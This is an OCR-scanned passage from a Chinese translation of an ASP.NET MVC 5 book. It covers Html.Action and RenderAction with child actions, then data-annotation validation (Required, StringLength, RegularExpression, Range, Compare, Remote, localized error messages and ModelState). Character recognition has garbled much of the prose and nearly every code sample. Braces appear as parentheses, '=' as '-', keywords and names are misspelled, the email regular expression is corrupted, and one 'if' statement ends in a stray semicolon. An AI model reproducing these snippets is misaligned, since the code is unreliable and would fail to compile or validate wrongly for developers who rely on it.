而 ，RenderPartial 拥 有 较 好 的 性 能 ， 因 为 它 是 直接 写 入 响应 流 的 , 但 这 种 性 能 优势 需要 大 量 的 
使 用 (高 的 网 站 流量 或 在 循环 中 重复 调用 ) 才 能 看 出 来 。 
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5.4.4 Html.Action 和 Html.RenderAction 


Action 和 RenderAction 类 似 于 Partial 和 RenderPartial 辅 助 方法 。Partial 辅 助 方法 通常 在 单独 
的 文件 中 应 用 视图 标记 来 帮助 视图 泻 染 视图 模型 的 一 部 分 。 另 一 方面 ，Action 执 行 单独 的 控 
制 器 操作 ， 并 显示 结果 。Action 提 供 了 更 多 的 灵活 性 和 重用 性 ， 因 为 控制 器 操作 可 以 建立 不 
同 的 模型 ， 可 以 利用 单独 的 控制 器 上 下 文 。 

同样 ，Action 和 RenderAction 之 间 仅 有 的 不 同 之 处 在 于 : RenderAction 可 以 直接 写 入 响应 
流 (这 可 以 带 来 微弱 的 效率 增益 )。 下 面 是 这 个 方法 用 法 的 简单 介绍 。 假 设 现在 使 用 的 是 如 下 
的 控制 器 : 

public class MyController : Controller ( 

public ActionResult Index() ( 


return View(); 
) 


[ChildActionOnly] 
public ActionResult Menu() ( 
var menu = GetMenuFromSomewhere (); 
return PartialView (menu); 
} 
} 


Menu 操 作 构 建 一 个 菜单 模型 ， 并 返回 一 个 带 有 菜单 的 部 分 视图 : 


@model Menu 

<ul> 

Gforeach (var item in Model.MenuItem) { 
«li»Qitem.Text«/li» 

} 


</ul> 

在 Index.cshtml 视 图 中 ， 可 以 调用 Menu 操 作 来 显示 菜单 
<html> 

<head><title>Index with Menu</title></head> 
<body> 


QHtml.Action ("Menu") 
Xhl»Welcome to the Index View«c/hl» 

</body> 

«/html» 

注意 Menu 操 作 使 用 了 ChildActionOnlyAttribute 特 性 标记 。 这 个 特性 设置 可 有 效 避 免 运行 
时 直接 通过 URL 来 调用 Menu 操 作 。 相 反 ， 只 能 通过 Action 或 RenderAction 方 法 来 调用 子 操作 。 
虽然 ChildActionOnlyAttribute 特 性 不 是 必需 的 ， 但 通常 在 进行 子 操作 时 推荐 使 用 。 

自 ASPNET MVC 3 开始 ， 在 ControllerContext 上 添加 了 一 个 新 属性 ， 它 的 名 称 是 
ISChildAction。 当 通过 Action 或 RenderAction 方 法 调用 操作 时 ， 它 的 值 就 为 tue; 当 通 过 一 个 URL 
调用 时 ， 它 的 值 就 为 flse。ASPNET MVC 运 行 时 的 一 些 操作 过 滤器 与 子 操作 是 不 同 的 ， 比 如 
AuthorizeAttribute 和 OutputCacheAttribute。 
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1. 给 RenderAction 传递 值 


因为 这 些 操 作 辅 助 方法 调用 的 是 操作 方法 ， 所 以 我 们 可 以 指定 目标 操作 的 一 些 额外 值 作 
为 参数 。 例 如 ， 假 设 现 在 想 向 菜单 中 添加 一 些 选 项 。 
(1) 定义 新 类 MenuOptions， 代 码 如 下 : 
public class MenuOptions ( 
public int Width ( get; set; } 


public int Height ( get; set; } 
) 


(2) 修改 Menu 操 作 方法 ， 使 其 可 以 作为 参数 接收 MenuOptions 对 象 : 


[ChildActionOnly] 

public ActionResult Menu(MenuOptions options) ( 
return PartialView (options); 

) 


(3) 在 视图 中 可 以 通过 Action 调 用 传 进 菜单 选项 ， 代 码 如 下 所 示 : 


GHtml.Action("Menu", new ( 
options = new MenuOptions ( Width-400, Height-500 } }) 


2. 5 ActionName 特性 结合 使 用 
需要 注意 的 另 一 点 是 ,RenderAction 方 法 优先 使 用 ActionName 特 性 值 作为 要 调用 的 操作 
名 称 。 如 果 按 照 下 面 的 方式 注解 操作 ， 那 么 当 调用 RenderAction 方 法 时 ， 和 需要 确保 操作 的 名 


余 是 CoolMenu 而 不 是 Menu。 


[ChildActionOnly] 

[ActionName ("CoolMenu")] 

public ActionResult Menu(MenuOptions options) { 
return PartialView (options); 

) 


5.5 小结 


本 章 首 先 介绍 了 如 何 为 Web 应 用 程序 构建 表单 , 而 后 讲解 了 如 何 使 用 ASPNET MVC 框 架 
中 带 有 的 ， 并 且 与 表单 和 泻 染 相关 的 HTML 辅 助 方 法 。 这 些 辅助 方法 的 目标 并 不 是 “ 拿 走 ” 
开发 人 员 对 应 用 程序 标记 的 控制 权 。 相 反 ， 它 们 的 目标 是 ， 在 项 目 开发 过 程 中 ， 保 留 对 标记 
的 完全 控制 权 的 同时 提高 开发 效率 。 


108 


数据 注解 和 验证 


本 章 主要 内 容 

o 利用 数据 注解 进行 验证 

e 如 何 创 建 自 定义 的 验证 逻辑 
o 模型 元 数据 注解 的 用 法 


本 章 代码 下 载 : 
在 以 下 网 址 的 Download Code 选 项 卡 中 ， 可 找到 本 章 的 代码 下 载 : http://www.wrox.com/ 
go/proaspnetmvc5。 本 章 的 代码 包含 在 文件 Wrox.ProMvc5.C06.zip 中 。 


对 于 Web 开 发 人 员 来 说 ， 用 户 输入 验证 一 直 是 一 个 挑战 。 不 仅 在 客户 端 浏 览 器 中 需要 执 
行 验证 逻辑 ， 在 服务 器 端 也 需要 执行 。 客 户 端 验 证 逻辑 会 对 用 户 向 表单 中 输入 的 数据 给 出 一 
个 即时 反馈 ， 这 也 是 时 下 Web 应 用 程序 所 期 望 的 特性 。 之 所 以 需要 服务 器 端 验证 逻辑 ， 主 要 
是 因为 来 自 网 络 的 信息 都 是 不 能 信任 的 。 

然而 ， 一 旦 从 全 局 来 看 ， 就 会 发 现 逻辑 仅 是 整个 验证 的 很 小 一 部 分 。 验 证 首先 需要 管理 
用 户 友好 (通常 是 本 地 化 ) 的 并 与 验证 逻辑 相关 的 错误 提示 消息 ， 当 验证 失败 时 ， 再 把 这 些 错 
误 提示 消息 呈现 在 用 户 界面 上 ， 当 然 还 要 向 用 户 提供 从 验证 失败 中 恢复 的 机 制 。 

如 果 觉 得 验证 是 令 人 望 而 生 朋 的 繁杂 琐事 ， 那 么 值得 欣慰 的 是 ASPNET MVC 框 架 可 以 
帮助 处 理 这 些 琐事 。 本 章 将 专注 于 讲解 ASPNET MVC 框 架 验 证 组 件 的 相关 知识 。 

当 在 ASPNET MVC 设 计 模 式 上 下 文中 谈论 验证 时 ， 主 要 关注 的 是 验证 模型 的 值 。 用 户 
输入 了 需要 的 值 吗 ? 是 要 求 范围 内 的 值 吗 ? ASPNET MVC 验 证 特性 可 以 帮助 我 们 验证 模型 
值 。 因 为 这 些 验 证 特性 是 可 扩展 的 ， 所 以 我 们 可 以 采用 任意 想 要 的 方式 构建 验证 模式 ， 但 默 
认 方法 是 一 种 声明 式 验证 ， 它 采用 了 本 章 介绍 的 数据 注解 特性 。 

本 章 首 先 讲解 数据 注解 如 何 与 ASPNET MVC 框 架 配 合 工作 ， 然 后 介绍 注解 的 用 途 ， 不 
单单 局 限于 验证 这 一 方面 。 注 解 是 一 种 通用 机 制 ， 可 以 用 来 向 框架 注入 元 数据 ， 同 时 ， 框 架 
不 只 驱动 元 数据 的 验证 ， 还 可 以 在 生成 显示 和 编辑 模型 的 HTML 标记 时 使 用 元 数据 。 下 面 首 
先 介绍 一 下 验证 的 应 用 场合 。 
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6.1 为 验证 注解 订单 


在 ASPNET MVC Music Store 购 买 音 乐 的 顾客 会 有 一 个 典型 的 购物 车 结算 环节 。 这 个 环 
节 需 要 付款 和 收 货 信息 。 本 章 将 通过 介绍 几 个 使 用 购物 车 场景 的 示例 ， 讲 解 表单 验证 。 

这 些 示 例 将 继续 使 用 第 4 章 中 的 简化 版 Music Store 示 例 (下 载 文件 为 
MvcMusicStore.C04.zip)。 回 忆 一 下 , 这 个 应 用 程序 包含 下 列 应 用 程序 特定 的 模型 类 文件 (当然 ， 
还 有 项 目 模板 创建 的 AccountViewModels.cs 和 IdentityModels.cs 文 件 ): 

e Album.cs 

* Artist.cs 

* MusicStoreDB.cs 

* MusicStoreDbInitializer.cs 

为 了 添加 对 购物 车 的 支持 ， 接 下 来 需要 在 models 目 录 中 添加 一 个 Ordercs 类 。Order 类 中 
包含 了 应 用 程序 完成 结算 环节 所 需要 的 所 有 信息 ， 代 码 如 程序 清单 6-1 所 示 : 


程序 清单 6-1 Order.cs 


Public Class Order 

{ 
public int OrderId { get; set; } 
public DateTime OrderDate { get; set; } 
public string Username { get; set; } 
public string FirstName { get; set; } 
public string LastName { get; set; } 
public string Address { get; set; } 
public string City { get; set; } 
public string State { get; set; } 
public string PostalCode { get; set; } 
public string Country { get; set; } 
public string Phone { get; set; } 
public string Email { get; set; } 
public decimal Total ( get; set; } 

) 


Order 类 的 一 些 属性 需要 由 顾客 直接 输入 (如 FirstName 和 LastName 属 性 ), 但 对 于 其 他 属性 
的 值 ， 应 用 程序 可 以 通过 其 他 方式 获得 ， 例 如 从 运行 环境 中 获得 或 从 数据 库 中 查找 (如 
Usemame 必 性 ， 由 于 顾客 在 结算 之 前 必定 已 经 登录 系统 ， 因 此 运行 环境 中 已 经 有 这 个 值 了 )。 

为 了 将 注意 力 集中 到 表单 验证 这 个 主题 上 ， 本 章 使 用 了 一 个 通过 基 架 构建 的 
OrderController， 它 是 被 强 类 型 化 的 Order 类 。 我 们 将 分 析 的 是 /Views/Order/Edit.cshtml 视 图 。 


注意 ”这 个 示例 场景 可 帮助 读者 专注 考虑 表单 验证 。 实 际 的 商店 会 包含 类 、 带 
辑 和 控制 器 来 支持 多 种 功能 ， 如 购物 车 管理 、 多 步骤 结算 ， 以 及 允许 将 匿名 购 
物 车 转移 到 一 个 注册 账户 。 

在 MVC Music Store 教 程 中 ， 购 物 和 结算 过 程 被 拆 分 到 了 ShoppingCartController 
和 CheckoutController 中 。 
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当 看 到 例子 中 把 订单 数据 直接 保存 到 没有 任何 特定 于 商店 的 逻辑 的 


OrderController 中 时 ， 不 必 感 到 困惑 或 者 担心 。 记 住 ， 本 章 的 关注 点 是 数据 注解 


和 表单 验证 ， 而 订单 表单 中 的 字段 为 我 们 的 目的 提供 了 很 好 的 例子 。 


右 击 controllers 目 录 , 使 用 “MVC 5 Controller with views, using Entity Framework” 基 架 模 
板 创建 一 个 新 的 控制 器 。 如 图 6-1 所 示 ， 将 该 控制 器 命名 为 OrderController， 并 将 模型 类 设置 


为 Order， 然 后 单 击 Add 按 钮 。 


接 下 来 ， 运 行 应 用 程序 ， 浏 览 到 /OrderCreate， 
如 图 6-2 所 示 。 

这 个 表单 存在 一 些 明 显 问 题 。 比 如 我 们 不 希望 
顾客 输入 OrderDate 和 Total, 应 用 程序 会 在 服务 器 端 
设置 。 同 样 ， 输 入 框 上 面 的 标签 名 对 开发 人 员 来 说 
有 一 定 的 意义 (FirstName 显 然 是 个 属性 名 ), 但 顾客 
面 对 这 个 标签 时 ， 就 会 理 不 清 头 绪 (难道 某 个 开发 
人 员 的 空格 键 坏 了 吗 )， 本 章 后 面 会 讲解 这 些 问 题 
的 解决 方法 。 

在 图 6-2 中 还 有 个 更 严重 但 不 容易 发 现 的 问题 : 
顾客 可 以 在 完全 没有 填写 表单 的 情况 下 单 击 表 单 底 
部 的 Submit Order 按 钮 , 应 用 程序 也 不 会 提醒 他 们 必 
须 提 供 像 姓 名 和 地 址 这 样 非常 重要 的 信息 。 下 面 介 
绍 的 数据 注解 功能 将 会 很 好 地 解决 这 些 问 题 。 


注意 使 用 基 架 创建 的 表单 自动 地 需 
要 OrderDate 和 Total 这 两 个 非 字符 串 必 
性 。 稍 后 将 介绍 原因 。 


Create 
Order 


图 6-2 
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6.1.1 验证 注解 的 使 用 


数据 注解 特性 定义 在 名 称 空间 System.ComponentModel DataAnnotations 中 (但 接 下 来 就 会 
看 到 ， 有 一 个 特性 不 在 这 个 名 称 空间 中 定义 )。 它 们 提供 了 服务 器 端 验证 的 功能 ， 当 在 模型 的 
属性 上 使 用 这 些 特性 时 ， 框 架 也 支持 客户 端 验证 。 在 名 称 空间 DataAnnotations 中 ， 有 4 个 特性 
可 以 用 来 应 对 一 般 的 验证 场合 。 下 面 从 Required 特 性 开始 对 它们 逐一 介绍 。 


1. Required 
因为 顾客 的 姓氏 和 名 字 都 是 必需 的 ， 所 以 需要 在 模型 类 Order 的 FirstName 和 LastName 


属性 上 面 添加 Required 特 性 (记得 为 System.ComponentModelDataAnnotations 添 加 一 条 using 
语句 ): 


[Required] 
public string FirstName ( get; set; } 


[Required] 
public string LastName ( get; set; ) 


更 新 后 的 Order 类 如 程序 清单 6-2 所 示 。 
程序 清单 6-2 ”Order.cs( 针 对 必需 字段 进行 了 更 新 ) 


using System; 

using System.Collections.Generic; 

using System.ComponentModel .DataAnnotations; 
using System.Linq; 

using System.Web; 


namespace MvcMusicStore.Models 
{ 
public class Order 
t 
public int OrderId ( get; set; } 
public DateTime OrderDate ( get; set; } 
public string Username ( get; set; ) 
[Required] 
public string FirstName ( get; set; } 
[Required] 
public string LastName ( get; set; } 
public string Address ( get; set; ) 
public string City ( get; set; ) 
public string State ( get; set; } 
public string PostalCode ( get; set; | 
public string Country ( get; set; } 
public string Phone ( get; set; } 
public string Email ( get; set; } 
public decimal Total ( get; set; } 


第 6 章 ”数据 注解 和 验证 


当 这 两 个 属性 值 中 的 一 个 是 null 或 空 时 ，Required 特 性 将 会 引发 一 个 验证 错误 ( 稍 后 介绍 
如 何 处 理 验 证 错误 )。 

与 所 有 内 置 的 验证 特性 一 样 ，Required 特 性 既 传递 服务 器 端 验证 逻辑 也 传递 客户 端的 验 
证 逻辑 (尽管 在 MVC 框 架 内 部 是 另 一 个 组 件 通 过 设计 一 个 验证 适配器 来 传递 该 特性 的 客户 端 
验证 逻辑 )。 

添加 该 特性 后 ， 如果 顾 客 在 没有 填写 姓氏 的 情况 下 提交 表单 ， 就 会 出 现 图 6-3 所 示 的 默认 
错误 提示 消息 。 


ren Err 


[ ] The OrderDate neia is required 
记 me rrsthame tei is requie. 
] The LastName te is requred 


然而 ， 即 使 顾客 在 客户 端的 浏览 器 中 没有 设置 允许 JavaScript 执 行 的 权限 ， 验 证 逻辑 也 会 
在 服务 器 端 捕获 到 一 个 空 名 属性 。 即 便 正确 地 实现 了 控制 器 操作 ( 稍 后 就 会 介绍 )， 顾 客 也 还 
是 会 看 到 图 6-3 所 示 截 图 中 显示 的 错误 提示 消息 。 这 种 客户 端 -服务 器 同步 验证 意义 巨大 ， 因 
为 保证 JavaScript 和 服务 器 上 具有 相同 的 规则 十 分 重要 。 基 于 特性 的 验证 确保 了 客户 端 和 服务 
器 端的 验证 规则 保持 同步 ， 因 为 这 些 规则 只 在 一 个 位 置 声明 。 


2. StringLength 


现在 已 经 要 求 顾客 必须 输入 名 字 ， 但 如 果 他 输入 了 一 个 非常 长 的 名 字 ， 该 怎么 处 理 呢 ? 
Wikipedia 中 讲 到 ， 名 字 最 长 的 是 费城 的 一 个 德 裔 排 字 工 人 ， 他 的 全 名 超过 了 500 个 字符 。 虽 
然 NET 中 的 String 字 符 串 理论 上 可 以 存储 数 GB 的 Unicode 字 符 , 但 MVC Music Store 的 数据 库 模 式 
设置 了 名 字 的 最 大 长 度 是 160 个 字符 。 如 果 试 图 向 数据 库 中 插入 一 个 超过 最 大 长 度 的 名 字 , 就 
会 出 现 异 常 。 这 就 是 StringLength 特 性 的 用 武之 地 ， 它 可 以 确保 顾客 提供 的 字符 串 长 度 符合 数 
据 库 模式 的 要 求 : 


[Required] 
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[StringLength (160)] 
public string FirstName ( get; set; } 


[Required] 
[StringLength (160)] 
public string LastName ( get; set; ) 


这 里 要 注意 一 下 对 同一 个 属性 设置 多 个 验证 特性 的 方式 。 设 置 了 StringLength 特 性 后 ， 顾 
客 如 果 输 入 了 过 多 的 字符 ,就 会 看 到 LastName 输 入 框 下 方 的 默认 错误 提示 消息 , 如 图 6-4 所 示 。 


FirstName 
lAdolph 


LastName 
(Wolfeschlegelsteinhause| The field LastName must be a string with a maximum length of 160. 


图 6-4 


名 为 MinimumLength 的 参数 是 一 个 可 选项 ， 它 可 以 用 来 设 定 字符 串 的 最 小 长 度 。 下 面 的 
代码 设置 了 FirstName 属 性 ， 要 求 顾 客 至 少 要 包含 3 个 (小 于 等 于 160 个 ) 字 符 的 属性 值 才能 通过 
验证 : 

[Required] 


[StringLength (160, MinimumLength-3)] 
public string FirstName { get; set; } 


3. RegularExpression 


模型 类 Order 的 一 些 属 性 要 求 的 不 只 是 简单 的 非 空 或 长 度 验证 。 例 如 , 某 些 订单 的 Email 
属性 需要 的 是 一 个 有 效 可 用 的 e-mail 地 址 。 然 而 事实 上 ， 在 不 向 该 地 址 发 送 一 封 邮 件 等 待 响 
应 的 情况 下 ， 确 保 一 个 e-mail 地 址 的 可 用 性 是 不 切合 实际 的 。 我 们 所 能 做 的 就 是 使 用 正则 表 
达 式 来 使 输入 的 字符 串 看 起 来 像 可 用 的 e-mail 地 址 : 

[RegularExpression (@"[A-2a-z0-9. $+-]+@[A-2a-2z0-9.-]+\. [A-Za-z] {2,4}")] 

public string Email { get; set; } 

正则 表达 式 是 一 种 检查 字符 串 格式 和 内 容 的 简洁 有 效 方式 。 如 果 顾 客 输入 的 e-mail 地 址 
不 能 和 正则 表达 式 匹 配 ， 就 会 看 到 如 图 6-5 所 示 的 错误 提示 消息 。 


Email 
Not a valid email! The field Email must match the 
regular expression TA-Za-z0-9. %+-]+@[A-Za-z0-9.-]+\ 
[A-Za-z(2.4)' 

图 6-5 


对 于 非 专业 开发 人 员 而 言 (甚至 对 一 些 专业 开发 人 员 来 说 也 是 如 此 )， 这 一 错误 提示 消息 
看 起 来 就 像 是 胡乱 敲 击 键盘 产生 的 乱码 ， 没 有 任何 实际 意义 。 鉴 于 此 ， 接 下 来 将 会 介绍 如 何 
设置 人 性 化 的 错误 提示 消息 。 

4. Range 


Range 特 性 用 来 指定 数值 类 型 值 的 最 小 值 和 最 大 值 。 如 果 MVC Music Store 仅 面向 中 年 顾 
客 提供 服务 的 话 ， 就 可 以 在 Order 类 中 添加 Age 属 性 并 按照 下 面 的 代码 在 其 上 添加 Range 特 性 : 
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[Range (35, 44)] 

public int Age { get; set; } 

该 特性 的 第 一 个 参数 设置 的 是 最 小 值 ， 第 二 个 参数 设置 的 是 最 大 值 ， 这 两 个 值 也 包含 在 
范围 之 内 。Range 特 性 既 可 用 于 int 类 型 ， 也 可 用 于 double 类 型 。 它 的 构造 函数 的 另 一 个 重 载 版 
本 中 有 一 个 Type 类 型 的 参数 和 两 个 字符 串 (这 样 就 可 以 给 date 属 性 和 decimal 属 性 添加 范围 限 
制 了 )。 


[Range (typeof (decimal), "0.00", "49.99")] 
public decimal Price ( get; set; } 


5. Compare 


Compare 特 性 确保 模型 对 象 的 两 个 属性 拥有 相同 的 值 。 例 如 ， 为 了 避免 顾客 输入 错误 ， 
往往 要 求 输入 两 次 e-mail 地 址 : 


[RegularExpression(8"[A-Za-z0-9. $+-]+@[A-2Za-2z0-9.-]+\. [A-Za-z] {2,4}")] 
public string Email { get; set; } 


[Compare ("Email")] 
public string EmailConfirm { get; set; } 


如 果 顾 客 两 次 输入 的 e-mail 地 址 不 一 致 ， 就 会 出 现 如 图 6-6 所 示 的 错误 提示 消息 。 
Email 

scott@odetocode com 

EmallConfm 

sallen@odetocode com 

| 'EmailConfirm and 'Email do not match 


图 6-6 


6. Remote 


ASPNET MVC 框 架 还 为 应 用 程序 在 名 称 空间 System Web.Mvc 中 额外 添加 了 Remote 验 证 
特性 。 

Remote 特 性 可 以 利用 服务 器 端的 回调 函数 执行 客户 端的 验证 逻辑 。 以 MVC Music Store 
中 RegisterModel 类 的 UserName 属 性 为 例 , 系统 中 不 允许 两 个 用 户 具 有 相同 的 UserName 值 , 但 
在 客户 端 很 难 通过 验证 来 确保 UserName 属 性 值 的 唯一 性 (除非 把 所 有 的 用 户 名 都 从 数据 库 传 
送 到 客户 端 )。 使 用 Remote 特 性 可 以 把 UserName 的 值 发 送 到 服务 器 ， 然 后 在 服务 器 端的 数据 
库 中 与 相应 的 表 字段 值 进 行 比较 : 

[Remote ("CheckUserName", "Account")] 

public string UserName { get; set; } 

在 特性 中 可 以 设置 客户 端 代码 要 调用 的 控制 器 名 称 和 操作 名 称 。 客 户 端 代码 会 自动 把 用 
户 输入 的 UserName 属 性 值 发 送 到 服务 器 , 该 特性 的 一 个 重 载 构造 方法 还 允许 指定 要 发 送 给 服 
务 器 的 其 他 字段 : 


public JsonResult CheckUserName (string username) 


í 
var result = Membership.FindUsersByName (username) .Count == 0; 
return Json (result, JsonRequestBehavior.AllowGet); 
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} 

上 面 的 控制 器 操作 会 利用 与 UserName 属 性 同名 的 参数 进行 验证 ， 并 返回 一 个 封装 在 
JavaScript Object Notation(JSON) 对 象 中 的 布尔 类 型 值 (true 或 lse)。 第 8 章 将 详细 介绍 JSON、 
Ajax 和 其 他 客户 端 特征 。 

正 是 由 于 数据 注解 的 可 扩展 性 ， 才 导致 了 Remote 特 性 的 产生 。 本 章 后 面部 分 会 介绍 如 何 
创建 自 定义 注解 。 下 面 介绍 如 何在 验证 规则 失败 时 创建 自 定义 的 错误 提示 消息 。 


6.1.2 自 定义 错误 提示 消息 及 其 本 地 化 


每 个 验证 特性 都 允许 传递 一 个 带 有 自 定义 错误 提示 消息 的 参数 。 例 如 ， 如 果 不 喜 欢 与 
RegularExpression 特 性 关联 的 默认 错误 提示 消息 (因为 它 显示 的 是 正则 表达 式 ), 可 使 用 如 下 代 
码 自 定义 错误 提示 消息 : 

[RegularExpression(8"[A-Za-z0-9. %+-]+@[A-2Za-z0-9.-]+\. [A-Za-z] (2,4) ", 


ErrorMessage-"Email doesn't look like a valid email address.")] 
public string Email ( get; set; } 


ErrorMessage 是 每 个 验证 特性 中 用 来 设置 错误 提示 消息 的 参数 名 称 : 


[Required (ErrorMessage="Your last name is required")] 

[stringLength (160, ErrorMessage="Your last name is too long")] 

public string LastName { get; set; } 

自 定义 的 错误 提示 消息 在 字符 串 中 也 有 一 个 格式 项 。 内 置 特性 使 用 友好 的 属性 显示 名 称 
格式 化 错误 提示 消息 字符 串 (本 章 后 面 会 详 述 如 何在 显示 注解 中 设置 显示 名 称 )。 作 为 一 个 例 
子 ， 请 看 下 面 代 码 中 的 Required 特 性 : 

[Required (ErrorMessage="Your {0} is required.")] 

[stringLength (160, ErrorMessage="{0} is too long.")] 

public string LastName { get; set; } 

该 特性 使 用 了 带 有 格式 项 ( {0} ) 的 错误 提示 消息 。 如 果 客 户 不 填写 LastName， 就 会 出 现 
如 图 6-7 所 示 的 错误 提示 消息 。 


FirstName 
Scott 


LastName 


Your LastName is required 


图 6-7 


如 果 应 用 程序 是 面向 国际 市 场 开发 的 ， 那 么 这 种 硬 编码 错误 提示 消息 的 技术 就 不 大 实用 
了 。 这 时 就 不 简单 是 像 上 面 这 样 显示 的 固定 文本 ， 而 是 为 不 同 的 地 区 显示 不 同 的 文本 内 容 。 
幸好 ， 所 有 验证 特性 都 允许 为 本 地 化 的 错误 提示 消息 指定 资源 类 型 名 称 和 资源 名 称 。 


[Required (ErrorMessageResourceType=typeof (ErrorMessages), 
ErrorMessageResourceName="LastNameRequired")] 
[StringLength(160, ErrorMessageResourceType = typeof (ErrorMessages), 
ErrorMessageResourceName = "LastNameTooLong")] 
public string LastName { get; set; } 
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上 面 的 代码 假设 在 项 目 中 有 一 个 名 为 ErorMessagesresx 的 资源 文件 ， 并 且 其 中 包含 所 需 
要 的 条 目 (如 LastNameRequired 和 LastNameTooLong)。 在 ASPNET 中 ， 要 使 用 本 地 化 的 资源 文 
件 ， 需 要 将 当前 线程 的 UICulture 属 性 设置 为 相应 的 地 域 语言 。 想 要 了 解 更 多 的 信息 ， 请 参阅 
“How to : Set the Culture and UI Culture for ASPNET Page Globalization”， 网 址 为 
http://msdn.microsoft.com/en-us/library/bz9tc508.aspx - 


6.1.3 注解 的 后 台 原 理 


在 介绍 控制 器 和 视图 中 的 验证 错误 如 何 协调 工作 以 及 如 何 创建 自 定义 的 验证 特性 之 前 ， 
很 有 必要 理解 验证 特性 的 内 部 机 制 .ASPNET MVC 的 验证 特性 是 由 模型 绑 定 器 、 模 型 元 数据 、 
模型 验证 器 和 模型 状态 组 成 的 协调 系统 的 一 部 分 。 


1. 验证 和 模型 绑 定 


在 阅读 验证 注解 部 分 时 ， 可 能 会 有 几 个 疑问 : 验证 是 什么 时 候 发 生 的 ? 如 何 才能 知道 验 
证 失败 ? 

默认 情况 下 ，ASPNET MVC 框 架 在 模型 绑 定 时 执行 验证 逻辑 。 正 如 第 4 章 中 提 到 的 ， 在 
操作 方法 带 有 参数 时 ， 就 会 隐 式 地 执行 模型 绑 定 : 

[HttpPost] 

public ActionResult Create (Album album) 

t 

// the album parameter was created via model binding 


/ e 
) 


当然 ， 也 可 以 利用 控制 器 的 UpdateModel 或 TryUpdateModel 方 法 显 式 地 执行 模型 绑 定 : 


[HttpPost] 
public ActionResult Edit(int id, FormCollection collection) 
{ 

var album = storeDB.Albums.Find(id); 

if (TryUpdateModel (album) ) 

t 

pru 

} 

} 


模型 绑 定 器 一 旦 使 用 新 值 完成 对 模型 属性 的 更 新 ， 就 会 利用 当前 的 模型 元 数据 获得 模型 
的 所 有 验证 器 。ASPNET MVC 运 行 时 提供 了 一 个 验证 器 (DataAnnotationsModelValidator) 来 与 
数据 注解 一 同 工 作 。 这 个 模型 验证 器 会 找到 所 有 的 验证 特性 并 执行 它们 包含 的 验证 逻辑 。 模 
型 绑 定 器 捕获 所 有 失败 的 验证 规则 并 把 它们 放 入 模型 状态 中 。 


2. 验证 和 模型 状态 


模型 绑 定 主要 的 副产品 是 模型 状态 (利用 Controller 派 生 类 对 象 的 ModelState 属 性 可 以 访问 
到 )。 模 型 状态 不 仅 包含 了 用 户 想 放 入 模型 属性 中 的 所 有 值 ， 也 包括 与 每 个 属性 相关 联 的 所 有 错 
误 (还 有 所 有 与 模型 对 象 本 身 有 关 的 错误 )。 如 果 在 模型 状态 中 存在 错误 ，ModelState IsValid 就 返 
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回 false。 

例如 , 假设 顾客 在 没有 填写 LastName 值 的 情况 下 , 提交 了 结算 表单 。 由 于 设置 了 Required 
验证 注解 特性 ， 因 此 在 模型 绑 定 之 后 ， 下 面 的 所 有 表达 式 将 返回 true: 
ModelState.IsValid == false 


ModelState.IsValidField("LastName") == false 
ModelState["LastName"].Errors.Count » 0 


也 可 在 模型 状态 中 查看 与 失败 验证 相关 的 错误 提示 消息 : 
Var lastNameErrorMessage = ModelState["LastName"].Errors[0].ErrorMessage; 


当然 ， 通 常 很 少 编写 代码 来 查看 特定 的 错误 提示 消息 。 跟 运行 时 自动 地 向 模型 状态 注入 
验证 错误 信息 一 样 , 它 也 能 够 自动 地 从 模型 状态 中 提取 错误 信息 。 正 如 第 5 章 介绍 的 , 内置 的 
HIML 辅助 方法 可 以 利用 模型 状态 (和 模型 状态 中 出 现 的 错误 ) 来 改变 模型 在 视图 中 的 显示 。 
例如 ，ValiadationMessage 辅 助 方法 可 通过 查看 模型 状态 来 显示 与 特定 部 分 视图 数据 相关 的 错 
误 提示 消息 : 


@Html .ValidationMessageFor (m => m.LastName) 


控制 器 操作 通常 需要 关心 的 问题 是 : 模型 状态 是 否 有 效 ? 
6.1.4. 控制 器 操作 和 验证 错误 


控制 器 操作 决定 了 在 模型 验证 失败 和 验证 成 功 时 的 执行 流程 。 在 验证 成 功 时 ， 操 作 通 常 
会 执行 必要 的 步骤 来 保存 或 更 新 客户 的 信息 。 当 验证 失败 时 ， 操 作 一 般 会 重新 泻 染 提 交 模 型 
值 的 视图 。 这 样 就 可 以 让 用 户 看 到 所 有 的 验证 错误 提示 消息 ， 并 按照 提示 改正 输入 错误 或 补 
填 遗 漏 的 字段 信息 。 以 下 代码 中 的 AddressAndPayment 操 作 就 展示 了 这 个 典型 的 操作 行为 : 

[HttpPost] 

public ActionResult AddressAndPayment (Order newOrder) 

{ 

if (ModelState.IsValid) 
t 


newOrder.Username = User.Identity.Name; 
newOrder.OrderDate - DateTime.Now; 
storeDB.Orders.Add (newOrder); 
StoreDB.SaveChanges(); 


// Process the order 
var cart - ShoppingCart.GetCart (this); 
cart.CreateOrder (newOrder); 
return RedirectToAction("Complete", new ( id = newOrder.Orderld }); 
} 
// Invalid -- redisplay with errors 
return View (newOrder); 
} 


上 面 的 这 段 代 码 将 立即 检查 ModelState 的 IsValid 标 记 。 模 型 绑 定 器 已 经 构建 好 一 个 Order 
类 对 象 ， 并 用 请 求 中 (提交 的 表单 ) 的 值 类 填充 它 。 当 模型 绑 定 器 完成 订单 的 更 新 后 ， 它 就 会 
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执行 所 有 与 这 个 对 象 关联 的 验证 规则 。 因 此 ， 可 以 知道 这 个 对 象 是 否 处 于 正确 状态 。 也 可 以 
通过 显 式 地 调用 UpdateModel 或 TryUpdateModel 来 实现 这 个 操作 ， 如 下 面 的 代码 所 示 : 
[HttpPost] 


public ActionResult AddressAndPayment (FormCollection collection) 
t 


var newOrder - new Order(); 

UpdateModel (newOrder); 

if (ModelState.IsValid) 

t 
newOrder.Username - User.Identity.Name; 
newOrder.OrderDate - DateTime.Now; 
StoreDB.Orders.Add (newOrder); 
storeDB.SaveChanges(); 


// Process the order 
var cart - ShoppingCart.GetCart (this); 
cart.CreateOrder (newOrder); 
return RedirectToAction("Complete", new ( id = newOrder.OrderId }); 
} 
// Invalid -- redisplay with errors 
return View (newOrder); 
) 


在 这 个 例子 中 ， 我 们 显 式 地 使 用 UpdateModel 进 行 绑 定 ， 然 后 检查 ModelState。 使 用 
TryUpdateModel 可 以 将 以 上 过 程 简化 为 一 步 ， 因 为 TryUpdateModel 会 绑 定 并 返回 结果 ， 如 下 
的 代码 所 示 : 


[HttpPost] 
public ActionResult AddressAndPayment (FormCollection collection) 
t 

var newOrder - new Order(); 

if (TryUpdateModel (newOrder)); 

t 


newOrder.Username - User.Identity.Name; 
newOrder.OrderDate - DateTime.Now; 
StoreDB.Orders.Add (newOrder); 
storeDB.SaveChanges(); 


// Process the order 
